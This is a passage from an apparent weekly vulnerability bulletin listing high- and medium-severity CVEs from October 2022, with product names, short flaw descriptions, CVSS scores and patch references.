sony — content_transfer	Untrusted search path vulnerability in the installer of Content Transfer (for Windows) Ver.1.3 and prior allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.	2022-10-24	7.8	CVE-2022-41796 MISC MISC
st — stm32_mw_usb_host	A buffer overflow vulnerability in stm32_mw_usb_host of STMicroelectronics allows an attacker to execute arbitrary code when the descriptor contains more endpoints than USBH_MAX_NUM_ENDPOINTS. The library is typically integrated when using a RTOS such as FreeRTOS on STM32 MCUs.	2022-10-21	9.8	CVE-2021-42553 CONFIRM
synology — diskstation_manager	Missing authentication for critical function vulnerability in iSCSI management functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote attackers to read or write arbitrary files via unspecified vectors.	2022-10-25	9.1	CVE-2022-27623 CONFIRM
synology — presto_file_server	Improper privilege management vulnerability in summary report management in Synology Presto File Server before 2.1.2-1601 allows remote authenticated users to bypass security constraint via unspecified vectors.	2022-10-26	8.8	CVE-2022-43749 CONFIRM
synology — presto_file_server	Improper limitation of a pathname to a restricted directory (‘Path Traversal’) vulnerability in file operation management in Synology Presto File Server before 2.1.2-1601 allows remote attackers to write arbitrary files via unspecified vectors.	2022-10-26	7.5	CVE-2022-43748 CONFIRM
tenda — ax1803_firmware	Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow vulnerability in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request.	2022-10-27	7.5	CVE-2022-40874 MISC
tenda — ax1803_firmware	Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow in the function GetParentControlInfo.	2022-10-27	7.5	CVE-2022-40875 MISC
uatech — badaso	Badaso version 2.6.0 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application does not properly validate the data uploaded by users.	2022-10-25	9.8	CVE-2022-41711 MISC MISC
vestacp — control_panel	myVesta Control Panel before 0.9.8-26-43 and Vesta Control Panel before 0.9.8-26 are vulnerable to command injection. An authenticated and remote administrative user can execute arbitrary commands via the v_sftp_license parameter when sending HTTP POST requests to the /edit/server endpoint.	2022-10-24	7.2	CVE-2021-46850 MISC MISC MISC MISC MISC
vim — vim	A vulnerability was found in vim and classified as problematic. Affected by this issue is the function qf_update_buffer of the file quickfix.c of the component autocmd Handler. The manipulation leads to use after free. The attack may be launched remotely. Upgrading to version 9.0.0805 is able to address this issue. The name of the patch is d0fab10ed2a86698937e3c3fed2f10bd9bb5e731. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-212324.	2022-10-26	7.5	CVE-2022-3705 MISC MISC
webmin — usermin	Usermin through 1.850 allows a remote authenticated user to execute OS commands via command injection in a filename for the GPG module.	2022-10-25	8.8	CVE-2022-35132 MISC MISC
wintercms — winter	Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework. This issue has been patched in v1.1.10 and v1.2.1. As a workaround, one may avoid this issue by following some common security practices for JavaScript, including implementing a content security policy and auditing scripts.	2022-10-26	9.8	CVE-2022-39357 MISC MISC MISC CONFIRM MISC
yokogawa — wtviewerefree	Stack-based buffer overflow in WTViewerE series WTViewerE 761941 from 1.31 to 1.61 and WTViewerEfree from 1.01 to 1.52 allows an attacker to cause the product to crash by processing a long file name.	2022-10-24	9.8	CVE-2022-40984 MISC MISC
yordam — library_automation_system	Yordam Library Information Document Automation product before version 19.02 has an unauthenticated Information disclosure vulnerability.	2022-10-27	7.5	CVE-2021-45475 CONFIRM
zalando — skipper	Zalando Skipper v0.13.236 is vulnerable to Server-Side Request Forgery (SSRF).	2022-10-25	9.8	CVE-2022-38580 MISC MISC MISC MISC

Medium Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
adenion — blog2social	The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.9.10 does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks	2022-10-25	6.5	CVE-2022-3247 CONFIRM
adminpad_project — adminpad	The AdminPad WordPress plugin before 2.2 does not have CSRF check when updating admin’s note, allowing attackers to make a logged in admin update their notes via a CSRF attack	2022-10-25	6.5	CVE-2022-2762 MISC
advantech — r-seenet	Advantech R-SeeNet Versions 2.4.19 and prior are vulnerable to path traversal attacks. An unauthorized attacker could remotely exploit vulnerable PHP code to delete .PDF files.	2022-10-27	5.3	CVE-2022-3387 MISC
algosec — fireflow	AlgoSec – FireFlow Reflected Cross-Site-Scripting (RXSS) A malicious user injects JavaScript code into a parameter called IntersectudRule on the search/result.html page. The malicious user changes the request from POST to GET and sends the URL to another user (victim). JavaScript code is executed on the browser of the other user.	2022-10-25	5.4	CVE-2022-36783 MISC
alivecor — kardia	CWE-302 Authentication Bypass by Assumed-Immutable Data in AliveCor Kardia App version 5.17.1-754993421 and prior on Android allows an unauthenticated attacker with physical access to the Android device containing the app to bypass application authentication and alter information in the app.	2022-10-26	6.1	CVE-2022-40703 MISC
apache — geode	Apache Geode versions up to 1.15.0 are vulnerable to a Cross-Site Scripting (XSS) via data injection when using Pulse web application to view Region entries.	2022-10-25	5.4	CVE-2022-34870 MISC MLIST
axiosys — bento4	A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. This issue affects the function AP4_StsdAtom of the file Ap4StsdAtom.cpp of the component MP4fragment. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212003.	2022-10-26	5.5	CVE-2022-3663 MISC MISC MISC
axiosys — bento4	A vulnerability has been found in Axiomatic Bento4 and classified as problematic. This vulnerability affects the function AP4_AtomFactory::CreateAtomFromStream of the component mp4edit. The manipulation leads to memory leak. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212008.	2022-10-26	5.5	CVE-2022-3668 MISC MISC MISC
axiosys — bento4	A vulnerability was found in Axiomatic Bento4 and classified as problematic. This issue affects the function AP4_AvccAtom::Create of the component mp4edit. The manipulation leads to memory leak. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212009 was assigned to this vulnerability.	2022-10-26	5.5	CVE-2022-3669 MISC MISC MISC
bookstackapp — bookstack	Cross-site scripting vulnerability in BookStack versions prior to v22.09 allows a remote authenticated attacker to inject an arbitrary script.	2022-10-24	5.4	CVE-2022-40690 MISC MISC MISC
bricksbuilder — bricks	The Bricks theme for WordPress is vulnerable to authorization bypass due to a missing capability check on the bricks_save_post AJAX action in versions 1.0 to 1.5.3. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to edit any page, post, or template on the vulnerable WordPress website.	2022-10-28	6.5	CVE-2022-3400 MISC MISC
broadcom — fabric_operating_system	Brocade Fabric OS Web Application services before Brocade Fabric v9.1.0, v9.0.1e, v8.2.3c, v7.4.2j store server and user passwords in the debug statements. This could allow a local user to extract the passwords from a debug file.	2022-10-25	6.5	CVE-2022-28170 MISC
broadcom — fabric_operating_system	A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5 could allow a local authenticated attacker to export out sensitive files with “seccryptocfg”, “configupload”.	2022-10-25	5.5	CVE-2022-33180 MISC
broadcom — fabric_operating_system	An information disclosure vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j could allow a local authenticated attacker to read sensitive files using switch commands “configshow” and “supportlink”.	2022-10-25	5.5	CVE-2022-33181 MISC
cisco — identity_services_engine	A vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by persuading an authenticated administrator of the web-based management interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.	2022-10-26	5.4	CVE-2022-20959 CISCO
dell — emc_isilon_onefs	The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.	2022-10-21	4.3	CVE-2020-5355 CONFIRM
dell — emc_powerscale_onefs	Dell PowerScale OneFS, versions 8.2.2-9.3.0, contain an OS command injection vulnerability. A privileged local malicious user could potentially exploit this vulnerability, leading to a full system compromise. This impacts compliance mode clusters.	2022-10-21	6.7	CVE-2022-34437 CONFIRM
dell — emc_powerscale_onefs	Dell PowerScale OneFS, versions 8.2.x-9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privileges could potentially exploit this vulnerability, leading to full system compromise. This impacts compliance mode clusters.	2022-10-21	6.7	CVE-2022-34438 CONFIRM
dell — emc_powerscale_onefs	Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, and 9.3.0.6, contain sensitive data in log files vulnerability. A privileged local user may potentially exploit this vulnerability, leading to disclosure of this sensitive data.	2022-10-21	4.4	CVE-2022-31239 CONFIRM
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PostEnergyType API.	2022-10-27	5.4	CVE-2022-40965 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PutLineMessageSetting API.	2022-10-27	5.4	CVE-2022-41555 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the SetPF API.	2022-10-27	5.4	CVE-2022-41651 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PutShift API.	2022-10-27	5.4	CVE-2022-41701 MISC
deltaww — diaenergie	The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the InsertReg API.	2022-10-27	5.4	CVE-2022-41702 MISC
eclipse — openj9	In Eclipse Openj9 before version 0.35.0, interface calls can be inlined without a runtime type check. Malicious bytecode could make use of this inlining to access or modify memory via an incompatible type.	2022-10-24	6.5	CVE-2022-3676 CONFIRM CONFIRM CONFIRM
employee_record_management_system_project — employee_record_management_system	Employee Record Management System v 1.2 is vulnerable to Cross Site Scripting (XSS) via editempprofile.php.	2022-10-28	5.4	CVE-2021-37781 MISC MISC
esri — arcgis_server	There is as reflected cross site scripting issue in Esri ArcGIS Server versions 10.9.1 and below which may allow a remote unauthorized attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the victim’s browser.	2022-10-25	6.1	CVE-2022-38195 CONFIRM
esri — arcgis_server	There is a reflected cross site scripting issue in the Esri ArcGIS Server services directory versions 10.9.1 and below that may allow a remote, unauthenticated attacker to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the victim’s browser.	2022-10-25	6.1	CVE-2022-38198 CONFIRM
esri — arcgis_server	A remote file download issue can occur in some capabilities of Esri ArcGIS Server web services that may in some edge cases allow a remote, unauthenticated attacker to induce an unsuspecting victim to launch a process in the victim’s PATH environment. Current browsers provide users with warnings against running unsigned executables downloaded from the internet.	2022-10-25	6.1	CVE-2022-38199 CONFIRM
exiv2 — exiv2	A vulnerability, which was classified as problematic, was found in Exiv2. This affects the function QuickTimeVideo::decodeBlock of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to null pointer dereference. It is possible to initiate the attack remotely. The name of the patch is 459910c36a21369c09b75bcfa82f287c9da56abf. It is recommended to apply a patch to fix this issue. The identifier VDB-212349 was assigned to this vulnerability.	2022-10-27	6.5	CVE-2022-3718 MISC MISC MISC
expresstech — quiz_and_survey_master	Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress.	2022-10-28	5.4	CVE-2021-36863 CONFIRM CONFIRM
fluxcd — source-controller	Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Fluxâ€™s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation.	2022-10-22	4.3	CVE-2022-39272 CONFIRM MISC
free5gc — free5gc	In free5GC 3.2.1, a malformed NGAP message can crash the AMF and NGAP decoders via an index-out-of-range panic in aper.GetBitString.	2022-10-24	5.5	CVE-2022-43677 MISC
genivi — diagnostic_log_and_trace	An issue was discovered in Connected Vehicle Systems Alliance (COVESA) dlt-daemon through 2.18.8. Due to a faulty DLT file parser, a crafted DLT file that crashes the process can be created. This is due to missing validation checks. There is a heap-based buffer over-read of one byte.	2022-10-25	5.5	CVE-2022-39836 MISC MISC
genivi — diagnostic_log_and_trace	An issue was discovered in Connected Vehicle Systems Alliance (COVESA) dlt-daemon through 2.18.8. Due to a faulty DLT file parser, a crafted DLT file that crashes the process can be created. This is due to missing validation checks. There is a NULL pointer dereference,	2022-10-25	5.5	CVE-2022-39837 MISC MISC
getkirby — kirby	Kirby is a Content Management System. Prior to versions 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1, a user enumeration vulnerability affects all Kirby sites with user accounts unless Kirby’s API and Panel are disabled in the config. It can only be exploited for targeted attacks because the attack does not scale to brute force. The problem has been patched in Kirby 3.5.8.2, Kirby 3.6.6.2, Kirby 3.7.5.1, and Kirby 3.8.1. In all of the mentioned releases, the maintainers have rewritten the affected code so that the delay is also inserted after the brute force limit is reached.	2022-10-25	5.3	CVE-2022-39315 CONFIRM MISC MISC MISC MISC
gitlab — gitlab	An information disclosure vulnerability in GitLab CE/EE affecting all versions starting from 9.3 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1 allows a project maintainer to access the DataDog integration API key from webhook logs.	2022-10-28	4.9	CVE-2022-3018 MISC CONFIRM
gitlab — gitlab	An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.6 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. A malicious maintainer could exfiltrate a GitHub integration’s access token by modifying the integration URL such that authenticated requests are sent to an attacker controlled server.	2022-10-28	4.3	CVE-2022-2882 MISC MISC CONFIRM
goabode — iota_all-in-one_security_kit_firmware	A double-free vulnerability exists in the web interface /action/ipcamSetParamPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability.	2022-10-25	6.5	CVE-2022-32574 MISC
google — bazel	A bad credential handling in the remote assets API for Bazel versions prior to 5.3.2 and 4.2.3 sends all user-provided credentials instead of only the required ones for the requests. We recommend upgrading to versions later than or equal to 5.3.2 or 4.2.3.	2022-10-26	4.3	CVE-2022-3474 CONFIRM
hospital_management_system_project — hospital_management_system	Hospital Management System v 4.0 is vulnerable to Cross Site Scripting (XSS) via /hospital/hms/admin/patient-search.php.	2022-10-28	5.4	CVE-2021-35388 MISC MISC
ipfire — ipfire	Multiple stored cross-site scripting vulnerabilities in the web user interface of IPFire versions prior to 2.27 allows a remote authenticated attacker with administrative privilege to inject an arbitrary script.	2022-10-24	4.8	CVE-2022-36368 MISC MISC MISC MISC
jadx_project — jadx	jadx is a set of command line and GUI tools for producing Java source code from Android Dex and Apk files. versions prior to 1.4.5 are subject to a Denial of Service when opening zip files with HTML sequences. This issue has been patched in version 1.4.5. There are no known workarounds.	2022-10-21	5.5	CVE-2022-39259 CONFIRM
joomla — joomla!	An issue was discovered in Joomla! 4.2.0 through 4.2.3. Inadequate filtering of potentially malicious user input leads to reflected XSS vulnerabilities in various components.	2022-10-25	6.1	CVE-2022-27913 MISC
joomla — joomla!	An issue was discovered in Joomla! 4.0.0 through 4.2.3. Sites with publicly enabled debug mode exposed data of previous requests.	2022-10-25	5.3	CVE-2022-27912 MISC
juiker — juiker	Juiker app hard-coded its AES key in the source code. A physical attacker, after getting the Android root privilege, can use the AES key to decrypt users’ ciphertext and tamper with it.	2022-10-24	6.1	CVE-2022-38117 MISC
lannerinc — iac-ast2500a_firmware	A broken access control vulnerability in the First_network_func function of spx_restservice allows an attacker to arbitrarily change the network configuration of the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	5.3	CVE-2021-26732 MISC MISC
lannerinc — iac-ast2500a_firmware	A broken access control vulnerability in the SubNet_handler_func function of spx_restservice allows an attacker to arbitrarily change the security access rights to KVM and Virtual Media functionalities. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	5.3	CVE-2021-44776 MISC MISC
lannerinc — iac-ast2500a_firmware	Observable discrepancies in the login process allow an attacker to guess legitimate user names registered in the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.	2022-10-24	5.3	CVE-2021-45925 MISC MISC
laubrotel — lbstopattack	The LBStopAttack WordPress plugin through 1.1.2 does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin’s protections.	2022-10-25	6.5	CVE-2022-3097 MISC
lemon8_project — lemon8	Improper authorization in handler for custom URL scheme vulnerability in Lemon8 App for Android versions prior to 3.3.5 and Lemon8 App for iOS versions prior to 3.3.5 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.	2022-10-24	6.5	CVE-2022-41797 MISC MISC MISC
linux — linux_kernel	A flaw was found in the KVM’s AMD nested virtualization (SVM). A malicious L1 guest could purposely fail to intercept the shutdown of a cooperative nested guest (L2), possibly leading to a page fault and kernel panic in the host (L0).	2022-10-25	5.5	CVE-2022-3344 MISC MISC
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931.	2022-10-21	5.5	CVE-2022-3630 N/A N/A
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959.	2022-10-21	5.5	CVE-2022-3642 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability.	2022-10-21	5.3	CVE-2022-3646 N/A N/A
litespeedtech — openlitespeed	Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1	2022-10-27	5.8	CVE-2022-0072 MISC MISC
metabase — metabase	Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, and 1.42.6, it was possible to circumvent locked parameters when requesting data for a question in an embedded dashboard by constructing a malicious request to the backend. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, and 1.42.6.	2022-10-26	6.5	CVE-2022-39358 CONFIRM
metabase — metabase	Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, custom GeoJSON map URL address would follow redirects to addresses that were otherwise disallowed, like link-local or private-network. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer follow redirects on GeoJSON map URLs. An environment variable `MB_CUSTOM_GEOJSON_ENABLED` was also added to disable custom GeoJSON completely (`true` by default).	2022-10-26	6.5	CVE-2022-39359 CONFIRM MISC
metabase — metabase	Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9 single sign on (SSO) users were able to do password resets on Metabase, which could allow a user access without going through the SSO IdP. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase now blocks password reset for all users who use SSO for their Metabase login.	2022-10-26	6.5	CVE-2022-39360 MISC CONFIRM
metabase — metabase	The url parameter of the /api/geojson endpoint in Metabase versions <44.5 can be used to perform Server Side Request Forgery attacks. Previously implemented blacklists could be circumvented by leveraging 301 and 302 redirects.	2022-10-26	6.5	CVE-2022-43776 MISC
mitel — micollab	A vulnerability in the MiCollab Client API of Mitel MiCollab through 9.5.0.101 could allow an authenticated attacker to modify their profile parameters due to improper authorization controls. A successful exploit could allow the authenticated attacker to impersonate another user’s name.	2022-10-25	6.5	CVE-2022-36454 MISC MISC
octopus — octopus_server	In affected versions of Octopus Server it is possible to reveal the existence of resources in a space that the user does not have access to due to verbose error messaging.	2022-10-27	5.3	CVE-2022-2508 MISC
online_medicine_ordering_system_project — online_medicine_ordering_system	A vulnerability classified as problematic was found in SourceCodester Online Medicine Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file /omos/admin/?page=user/list. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-212347.	2022-10-27	5.4	CVE-2022-3716 MISC
open-xchange — ox_app_suite	OX App Suite through 8.2 allows XSS via an attachment or OX Drive content when a client uses the len or off parameter.	2022-10-25	6.1	CVE-2022-31468 MISC
openfga — openfga	OpenFGA is an authorization/permission engine. Prior to version 0.2.4, the `streamed-list-objects` endpoint was not validating the authorization header, resulting in disclosure of objects in the store. Users `openfga/openfga` versions 0.2.3 and prior who are exposing the OpenFGA service to the internet are vulnerable. Version 0.2.4 contains a patch for this issue.	2022-10-25	5.3	CVE-2022-39340 CONFIRM MISC MISC
owasp — dependency-track	Dependency-Track is a Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Prior to version 4.6.0, performing an API request using a valid API key with insufficient permissions causes the API key to be written to Dependency-Track’s audit log in clear text. Actors with access to the audit log can exploit this flaw to gain access to valid API keys. The issue has been fixed in Dependency-Track 4.6.0. Instead of logging the entire API key, only the last 4 characters of the key will be logged. It is strongly recommended to check historic logs for occurrences of this behavior, and re-generating API keys in case of leakage.	2022-10-25	4.4	CVE-2022-39351 MISC CONFIRM MISC
owasp — dependency-track_frontend	@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Due to the common practice of providing vulnerability details in markdown format, the Dependency-Track frontend renders them using the JavaScript library Showdown. Showdown does not have any XSS countermeasures built in, and versions before 4.6.1 of the Dependency-Track frontend did not encode or sanitize Showdown’s output. This made it possible for arbitrary JavaScript included in vulnerability details via HTML attributes to be executed in context of the frontend. Actors with the `VULNERABILITY_MANAGEMENT` permission can exploit this weakness by creating or editing a custom vulnerability and providing XSS payloads in any of the following fields: Description, Details, Recommendation, or References. The payload will be executed for users with the `VIEW_PORTFOLIO` permission when browsing to the modified vulnerability’s page. Alternatively, malicious JavaScript could be introduced via any of the vulnerability databases mirrored by Dependency-Track. However, this attack vector is highly unlikely, and the maintainers of Dependency-Track are not aware of any occurrence of this happening. Note that the `Vulnerability Details` element of the `Audit Vulnerabilities` tab in the project view is not affected. The issue has been fixed in frontend version 4.6.1.	2022-10-25	5.4	CVE-2022-39350 CONFIRM MISC MISC
paessler — prtg_network_monitor	PRTG Network Monitor through 22.2.77.2204 does not prevent custom input for a device’s icon, which can be modified to insert arbitrary content into the style tag for that device. When the device page loads, the arbitrary Cascading Style Sheets (CSS) data is inserted into the style tag, loading malicious content. Due to PRTG Network Monitor preventing “characters, and from modern browsers disabling JavaScript support in style tags, this vulnerability could not be escalated into a Cross-Site Scripting vulnerability.	2022-10-25	5.3	CVE-2022-35739 MISC MISC
password_storage_application_project — password_storage_application	Password Storage Application v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Setup page.	2022-10-27	5.4	CVE-2022-42993 MISC MISC MISC
pulpproject — pulp_ansible	The collection remote for pulp_ansible stores tokens in plaintext instead of using pulp’s encrypted field and exposes them in read/write mode via the API () instead of marking it as write only.	2022-10-25	5.5	CVE-2022-3644 MISC
retain — retain_live_chat	The Retain Live Chat WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-25	4.8	CVE-2022-3391 CONFIRM
rubyonrails — rails	A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is be177e4566747b73ff63fd5f529fab564e475ed4. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212319.	2022-10-26	5.4	CVE-2022-3704 MISC MISC MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add”.	2022-10-28	5.4	CVE-2022-43164 MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking “Create”.	2022-10-28	5.4	CVE-2022-43165 MISC
rukovoditel — rukovoditel	A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add New Entity”.	2022-10-28	5.4	CVE-2022-43166 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability, which was classified as problematic, has been found in SourceCodester Sanitization Management System 1.0. This issue affects some unknown processing of the file /php-sms/classes/SystemSettings.php. The manipulation of the argument name/shortname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212015.	2022-10-26	6.1	CVE-2022-3672 N/A
sanitization_management_system_project — sanitization_management_system	A vulnerability, which was classified as problematic, was found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the file /php-sms/classes/Master.php. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212016.	2022-10-26	6.1	CVE-2022-3673 N/A
sem-cms — semcms	SEMCMS SHOP v 1.1 is vulnerable to Cross Site Scripting (XSS) via Ant_M_Coup.php.	2022-10-28	6.1	CVE-2021-38728 MISC MISC
simple_online_public_access_catalog_project — simple_online_public_access_catalog	A stored cross-site scripting (XSS) vulnerability in Simple Online Public Access Catalog v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Account Full Name field.	2022-10-27	5.4	CVE-2022-42991 MISC MISC MISC
softr — softr	Softr v2.0 was discovered to contain a Cross-Site Scripting (XSS) vulnerability via the First Name parameter under the Create A New Account module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload.	2022-10-27	6.1	CVE-2022-32407 MISC MISC
synology — diskstation_manager	Server-Side Request Forgery (SSRF) vulnerability in Package Center functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote authenticated users to access intranet resources via unspecified vectors.	2022-10-25	4.3	CVE-2022-27622 CONFIRM
tasks — tasks	The Tasks.org Android app is an open-source app for to-do lists and reminders. The Tasks.org app uses the activity `ShareLinkActivity.kt` to handle “share” intents coming from other components in the same device and convert them to tasks. Those intents may contain arbitrary file paths as attachments, in which case the files pointed by those paths are copied in the app’s external storage directory. Prior to versions 12.7.1 and 13.0.1, those paths were not validated, allowing a malicious or compromised application in the same device to force Tasks.org to copy files from its internal storage to its external storage directory, where they became accessible to any component with permission to read the external storage. This vulnerability can lead to sensitive information disclosure. All information in the user’s notes and the app’s preferences, including the encrypted credentials of CalDav integrations if enabled, could be accessed by third party applications installed on the same device. This issue was fixed in versions 12.7.1 and 13.0.1. There are no known workarounds.	2022-10-25	5.5	CVE-2022-39349 CONFIRM MISC
tech-banker — contact_bank	The Contact Bank WordPress plugin through 3.0.30 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-25	4.8	CVE-2022-3350 MISC
tenable — nessus	An authenticated attacker could read Nessus Debug Log file attachments from the web UI without having the correct privileges to do so. This may lead to the disclosure of information on the scan target and/or the Nessus scan to unauthorized parties able to reach the Nessus instance.	2022-10-25	6.5	CVE-2022-33757 MISC
themepoints — testimonials	Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Themepoints Testimonials plugin <= 2.6 on WordPress.	2022-10-28	4.8	CVE-2021-36858 CONFIRM CONFIRM
train_scheduler_app_project — train_scheduler_app	Multiple stored cross-site scripting (XSS) vulnerabilities in Train Scheduler App v1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Train Code, Train Name, and Destination text fields.	2022-10-27	5.4	CVE-2022-42992 MISC MISC MISC
